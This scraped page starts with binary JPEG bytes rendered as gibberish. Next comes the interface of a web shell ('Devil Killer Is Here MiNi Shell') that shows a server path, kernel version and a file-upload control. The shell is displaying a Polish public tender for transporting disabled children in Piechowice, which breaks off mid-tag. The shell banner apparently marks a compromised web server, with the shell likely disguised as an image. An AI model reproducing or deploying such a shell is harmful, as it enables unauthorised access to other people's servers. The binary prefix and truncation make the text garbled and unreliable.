JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230830/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230830/0037407401-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowóz dzieci niepełnosprawnych z terenu Gminy Miejskiej Piechowice do placówek oświatowych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miejska Piechowice</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 230821612</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kryształowa 49</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Piechowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-573</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">75 75 48 900</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@piechowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://piechowice.bip.net.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowóz dzieci niepełnosprawnych z terenu Gminy Miejskiej Piechowice do placówek oświatowych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ae151020-4722-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00374074</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-08-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00057895/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Dowożenie uczniów do szkół</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/811571 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Postępowanie prowadzone jest za pośrednictwem platformazakupowa.pl pod<br/>adresem: https://platformazakupowa.pl/transakcja/811571<br/>2. Komunikacja w postępowaniu o udzielenie zamówienia w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, z uwzględnieniem wyjątków określonych w ustawie p.z.p., odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną.<br/>3. Komunikacja między Zamawiającym a Wykonawcami odbywa się za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do zamawiającego”.<br/>4. Zamawiający będzie przekazywał Wykonawcom informacje za pośrednictwem platformazakupowa.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 p.z.p., podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .pdf, .doc, .docx, .odt. (UWAGA: format .rar nie jest dopuszczalny – listę dopuszczalnych formatów danych stanowi załącznik nr 2 do Obwieszczenia Prezesa Rady Ministrów z dnia 9 listopada 2017 r. w sprawie ogłoszenia jednolitego tekstu rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych).<br/>2. Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 31 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie, określa niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>3) zainstalowana dowolna przeglądarka internetowa, inna niż Internet Explorer,<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf.<br/>3. Ofertę składa się pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym (UWAGA: podpis osobisty nie jest tożsamy z podpisem własnoręcznym).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych), zwanym dalej &#34;RODO&#34;, informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest Burmistrz Miasta Piechowice;<br/>2) administrator wyznaczył Inspektora Ochrony Danych Osobowych, z którym można się kontaktować pod adresem e-mail: biuro@msvs.com.pl<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym z możliwością negocjacji;<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 p.z.p.;<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 p.z.p. przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach p.z.p., związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO;<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu albo sprecyzowania nazwy lub daty zakończonego postępowania o udzielenie<br/>zamówienia);<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą p.z.p. oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy<br/>interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>8) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.<br/>2. Wykonawca zobowiązuje się zapoznać z powyższymi informacjami wszystkich pracowników oraz podwykonawców, których dane udostępni Zamawiającemu.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IZP.271.6.2.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest świadczenie usługi transportu uczniów niepełnosprawnych wraz z zapewnieniem opiekuna z terenu Gminy Miejskiej Piechowice do wskazanych przez Zamawiającego placówek oświatowych w Jeleniej Górze oraz w Starej Kamienicy, w terminie od 2 października 2023 r. do zakończenia roku szkolnego 2023/2024, który w momencie publikacji<br/>ogłoszenia o zamówieniu planowany jest na 21 czerwca 2024 r., we wszystkie dni nauki, zgodnie z kalendarzem roku szkolnego ogłoszonym przez Ministra Edukacji Narodowej oraz w przypadku odpracowywania zajęć w innym dniu, wolnym od zajęć, również w tym dniu. Transport będzie odbywał się we wskazanym terminie dwa razy dziennie: jeden kurs rano (dowóz) i drugi kurs po południu (powrót). Dowóz będzie dostosowany do godzin zajęć w szkole w godzinach ustalonych z rodzicami lub opiekunami prawnymi uczniów niepełnosprawnych. Wykonawca zapewni na czas przewozu co najmniej<br/>jednego opiekuna sprawującego opiekę nad maksymalnie siedmioma (7) osobami niepełnosprawnymi. Zamówienie obejmuje transport w ilości jedenastu (11) uczniów niepełnosprawnych wraz z opiekunami z miejsc<br/>zamieszkania uczniów. Łączna dzienna długość transportu na trasie: Piechowice – Stara Kamienica wynosi 30 km.<br/>Łączna dzienna długość transportu na trasie: Piechowice – Jelenia Góra wynosi 47 km.<br/>Liczba dni nauki szkolnej – 166.<br/>Zamawiający nie zezwala na łączenie transportu uczniów z terenu Gminy Miejskiej Piechowice z transportem uczniów, którzy nie są mieszkańcami Gminy Miejskiej Piechowice. Wykonawca zobowiązany jest do uzgodnienia z Zamawiającym szczegółowych warunków realizacji zamówienia, w tym<br/>opracowania optymalnej trasy, uzgodnienia godzin i minut odjazdu i przyjazdu w miejsca docelowe oraz inne kwestie mające wpływ na właściwe, rzetelne wykonanie zamówienia, w terminie 5 dni od dnia podpisania umowy. Przed<br/>przystąpieniem do realizacji zamówienia, Wykonawca przedłoży aktualne dokumenty potwierdzające dopuszczenie pojazdów do ruchu (dowód rejestracyjny). W przypadku, gdy Wykonawca nie jest właścicielem tych pojazdów, również dokument potwierdzający tytuł prawny do dysponowania nimi oraz dokumenty potwierdzające posiadane ubezpieczenie OC i NNW tych pojazdów. Pojazdy przeznaczone do realizacji usługi powinny posiadać dowód rejestracyjny z aktualnymi badaniami technicznymi. Wykonawca zobowiązany jest do zatrudnienia kierowców posiadających stosowne uprawnienia do kierowania pojazdem określone u ustawie z dnia 20 czerwca 1997 r. - Prawo o ruchu drogowym. Wykonawca winien zapewnić 2 osoby, które będą pełniły funkcję opiekuna w czasie realizacji przedmiotowego zamówienia. Opiekunem dzieci i młodzieży niepełnosprawnej podczas transportu do szkół i placówek oświatowych musi być osoba pełnoletnia, która jest zdolna do ponoszenia odpowiedzialności (karnej, cywilnej) za działanie lub zaniechanie działania w związku ze sprawowaną opieką, nie była skazana prawomocnym wyrokiem sądu za umyślne przestępstwo ścigane z<br/>oskarżenia publicznego, ciesząca się nieposzlakowaną opinią. Opiekun pomaga wsiąść i wysiąść dzieciom i młodzieży niepełnosprawnej do i z pojazdu. Opiekun odpowiada za to, aby w czasie transportu dzieci i młodzież niepełnosprawna były zabezpieczone pasami bezpieczeństwa lub przewożone w foteliku (dostarczonym przez rodziców lub opiekunów prawnych).<br/>Opiekun zwraca uwagę na właściwe zachowanie się dzieci podczas przejazdu. Po dowiezieniu do szkoły opiekun przyprowadza dzieci do szatni i przekazuje osobie dyżurującej, po zakończeniu zajęć opiekun odbiera dzieci z szatni ze<br/>szkoły i po dowiezieniu przekazuje pod opiekę rodzicom (prawnym opiekunom). Opiekun powinien uzyskać od rodziców lub prawnych opiekunów dzieci i młodzieży niepełnosprawnej przewożonej pojazdem zgodę na udostępnienie numeru telefonu kontaktowego, aby mógł w sytuacjach trudnych skontaktować się z nimi. Opiekun, wykonując czynności, zobowiązany jest do stosowania przepisów ustawy z dnia 10 maja 2018 r. o ochronie danych osobowych. Wykonawca winien zachować, w miarę możliwości, stałą kadrę biorącą udział w realizacji niniejszego zamówienia, a<br/>dokonywanie zmian osobowych jest możliwe jedynie w uzasadnionych przypadkach. Wykonawca jest zobowiązany do niezwłocznego, tj. w ciągu 2 dni od momentu powzięcia informacji o konieczności dokonania zmian, powiadomienia Zamawiającego o każdej zmianie w organizacji przewozu, w tym zmianie opiekuna. Zmiana zgłaszana będzie pisemnie i wymaga dołączenia stosownych dokumentów, m.in. poświadczających kwalifikacje opiekuna, uprawnienia kierowcy do prowadzenia pojazdów. Wykonawca jest zobowiązany do wyznaczenia osoby do kontaktów w sprawie świadczenia<br/>niniejszej usługi wraz z podaniem imienia i nazwiska, adresu e-mail, nr telefonu w terminie 5 dni od dnia podpisania umowy. Zamawiający zastrzega sobie prawo przekazania tych danych rodzicom lub opiekunom prawnym uczniów niepełnosprawnych w celu informowania np. o absencjach chorobowych czy innych okolicznościach mających wpływ na realizację zamówienia / przewozów w danym dniu. Kontakt ten będzie również udostępniony przedstawicielom placówek oświatowych. Wykonawca zobowiązuje się do zapewnienia uczniom warunków bezpieczeństwa i higieny oraz wygód, jakie ze względu na rodzaj transportu i niepełnosprawności uważa się za niezbędne. Wykonawca winien dysponować co najmniej dwoma<br/>pojazdami przystosowanymi do przewozu uczniów, spełniającymi wymogi bezpieczeństwa i Kodeksu drogowego, ubezpieczonymi i zabezpieczającymi przewóz co najmniej 9 osób. Wszystkie te pojazdy, którymi realizowany będzie przedmiot zamówienia muszą być zarejestrowane, dopuszczone do ruchu, posiadać aktualne badania techniczne oraz ubezpieczenie OC. Pojazdy te muszą spełniać warunki określone w Rozporządzeniu Ministra Infrastruktury z dnia 31 grudnia 2002 r. w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia. Wykonawca<br/>zobowiązany jest także do zachowania ciągłości ubezpieczenia komunikacyjnego OC i NNW dla wszystkich pojazdów używanych do wykonania niniejszego zamówienia oraz naprawienia szkody powstałej na skutek wypadku i zdarzeń z winy Wykonawcy mających miejsce w trakcie wykonywania zamówienia. Usługi mają być wykonywane przez osoby posiadające odpowiednie kwalifikacje, wiedzę i uprawnienia do ich świadczenia. Zamawiający ma prawo na każdym etapie wykonywania umowy zweryfikować ww. okoliczności. Zamawiający może nie wyrazić zgody na świadczenie usług przez Wykonawcę, jeżeli stan pojazdu lub stan kierowcy czy też opiekuna budzą uzasadnione wątpliwości, np. brak ubezpieczenia pojazdu, brak aktualnego przeglądu technicznego pojazdu, brak kwalifikacji do prowadzenia pojazdu przez kierowcę lub skargi rodziców dotyczące niewłaściwego zachowania kierowcy lub opiekuna wobec przewożonych dzieci. W takim przypadku Wykonawca jest zobowiązany do powstrzymania się ze świadczeniem usługi za pomocą danego pojazdu lub osoby i<br/>niezwłocznego, w czasie do ….. minut (czas określony przez Wykonawcę w formularzu oferty stanowiącym załącznik nr 1 do SWZ; czas reakcji stanowi kryterium oceny ofert i nie może być dłuższy niż 60 minut), zorganizowania pojazdu zastępczego lub zastępstwa kierowcy lub opiekuna zapewniającego równorzędny poziom usług. Zastępstwo takie możliwe jest również w przypadku czasowej niemożności świadczenia usług w uzasadnionych przypadkach zaistniałych z przyczyn losowych, technicznych, prawnych, m.in. choroba, awaria. Zastępstwo takie nie może zakłócać przyjętych szczegółowych ustaleń dotyczących świadczenia usługi. Czas reakcji liczony będzie:<br/>1. od wydania przez upoważnionego pracownika Zamawiającego dyspozycji wyjazdu pojazdu zastępczego do momentu podstawienia gotowego do przewozu zastępczego pojazdu, lub<br/>2. od wydania przez upoważnionego pracownika Zamawiającego dyspozycji o konieczności zastąpienia kierowcy lub opiekuna w przypadku uzasadnionej niedyspozycji (np. stan nietrzeźwości) do momentu ich zastąpienia.<br/>W przypadku nie dokonania zamiany przez Wykonawcę w wymaganym czasie, Zamawiający może powierzyć wykonywanie umowy w danym przypadku podmiotowi trzeciemu na koszt i ryzyko Wykonawcy. Wykonawca zobowiązany jest do sprawowania opieki nad przewożonymi uczniami w przypadku awarii czy innego zdarzenia losowego, zapewniając im<br/>bezpieczeństwo do czasu podstawienia pojazdu zastępczego, a następnie zapewnienia opieki w pojeździe zastępczym. Wykonawca zobowiązuje się wykonać usługi przewozowe w sposób rzetelny i fachowy. Wykonawca zobowiązany jest do informowania Zamawiającego o wszelkich okolicznościach / nieprawidłowościach mających wpływ na jakość świadczonej usługi w terminie 2 dni od zaistnienia tych okoliczności. Wykonawca odpowiada za bezpieczeństwo uczniów w trakcie ich przewozu, jak również ponosi wyłączną odpowiedzialność za szkody powstałe z jego winy oraz z winy uczniów powstałe w związku z realizacją zamówienia.<br/>Wykonawca jest zobowiązany do zapewnienia opieki uczniom od momentu przekazania ich przez rodziców lub prawnych opiekunów do momentu przekazania opiekunowi w szkole / placówce oraz od momentu odebrania ucznia ze szkoły / placówki do momentu jego przekazania pod opiekę rodzica lub opiekuna prawnego. Zamawiający przewiduje możliwość zwiększenia maksymalnego nominalnego wynagrodzenia Wykonawcy w przypadku konieczności wprowadzenia dodatkowego środka transportu wraz z całą obsługą (tj. kierowcy i opiekuna) lub skutkującej zmianą organizacji świadczenia. W takim przypadku zaoferowana stawka dzienna Wykonawcy zwiększy się i będzie odpowiadać ilości rzeczywiście pokonywanych w ciągu dnia kilometrów. Zmiana wynagrodzenia nastąpi w formie pisemnej, na wniosek Wykonawcy, na podstawie udokumentowanej zmiany faktycznie pokonanych kilometrów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60000000-8 - Usługi transportowe (z wyłączeniem transportu odpadów)</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">60100000-9 - Usługi w zakresie transportu drogowego</p> <p class="mb-0">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-10-02 do 2024-06-21</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span 